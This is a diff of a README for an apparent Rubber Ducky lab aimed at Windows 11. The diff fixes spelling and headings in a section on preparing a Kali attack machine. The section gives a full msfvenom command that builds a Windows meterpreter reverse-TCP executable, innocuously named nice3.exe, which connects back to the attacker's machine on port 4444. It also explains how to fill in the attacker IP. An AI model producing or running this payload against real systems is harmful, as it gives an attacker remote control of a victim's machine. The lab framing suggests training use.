Meeps-Underflow/Win11_Ducky_PWN/README.md

 - NAT Network if using VM's (Need communication between VMS)

 ### Preparing Kali Machine
-#### Generate Payload
+#### Generate Malicous Executeable (Reverse Shell)
-- Use 'msfvenom' to genrate our malicous executable
+- Use 'msfvenom' to generate our malicous executable
 <pre>msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe > /home/x/Desktop/nice3.exe</pre>
 - LHOST is the IP adderess of our attacking machine that will act as the server to connect back to replace x.x.x.x with you machines IP
 - For /home/x/Desktop/nice3.exe replace x with your Kali Linux username eg /home/Meeps-Underflow/Desktop/nice3.exe